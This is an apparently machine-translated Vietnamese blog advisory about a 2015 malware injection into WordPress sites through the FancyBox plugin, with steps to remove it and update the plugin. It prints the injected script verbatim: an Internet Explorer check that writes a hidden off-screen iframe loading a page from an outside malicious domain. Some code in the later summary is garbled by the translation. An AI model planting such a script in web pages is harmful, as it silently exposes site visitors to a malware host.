Vào đầu tuần, một loạt các trang web và blog với WordPress, nhận được cảnh báo về Nhiễm phần mềm độc hại bởi vì Webmasters Google.
Vấn đề mà tại đó Webmasters Google đề cập đến là sự hiện diện của một COD / kịch bản Phần mềm độc hại iframe Trong nguồn của các trang web.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Nó dường như là một lỗ hổng Một pluginmua lạiFancyBox cho WordPress mà cho đến ngày hôm qua (05.02.2015) đã không được cập nhật trong một thời gian dài.
Giải quyết vấn đề này và Khử trùng các vị trí virus Với phần mềm độc hại này, nó tương đối đơn giản.
1. Vô hiệu hóa Plugn Fancybox.
2. Xóa tất cả các tệp plugin FancyBox trên máy chủ (thông qua FTP)
3. Cài đặt phiên bản mới của plugin (Fancybox 3.0.4)
FancyBox cho WordPress 3.0.4
– Được đổi tên thành cài đặt bị ảnh hưởng bởi vấn đề bảo mật được đề cập trong 3.0.3. Điều này sẽ ngăn mã độc xuất hiện trên các trang web nơi plugin được cập nhật mà không cần xóa mã độc.
FancyBox cho WordPress 3.0.3
– Đã khắc phục sự cố bảo mật.
Thông tin phần mềm độc hại:
Loại: Chuyển hướng iframe
Mục tiêu: WordPress Fancybox
Miền phần mềm độc hại: 203koko.eu
Phần mềm độc hại URI: http://203koko.eu/hjnfh/ipframe2.php
Phần mềm độc hại Mã thô: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” chiều rộng =”20″ Chiều cao =”30″ ></iframe>
Tập lệnh phần mềm độc hại: <kịch bản>if (navigator.useragent.match (/msie/i)) {document.write (‘ <Div Style =”Vị trí: Tuyệt đối; trái: -2000px; chiều rộng: 2000px”>
Xóa phần mềm độc hại khỏi trang web WordPress của bạn.
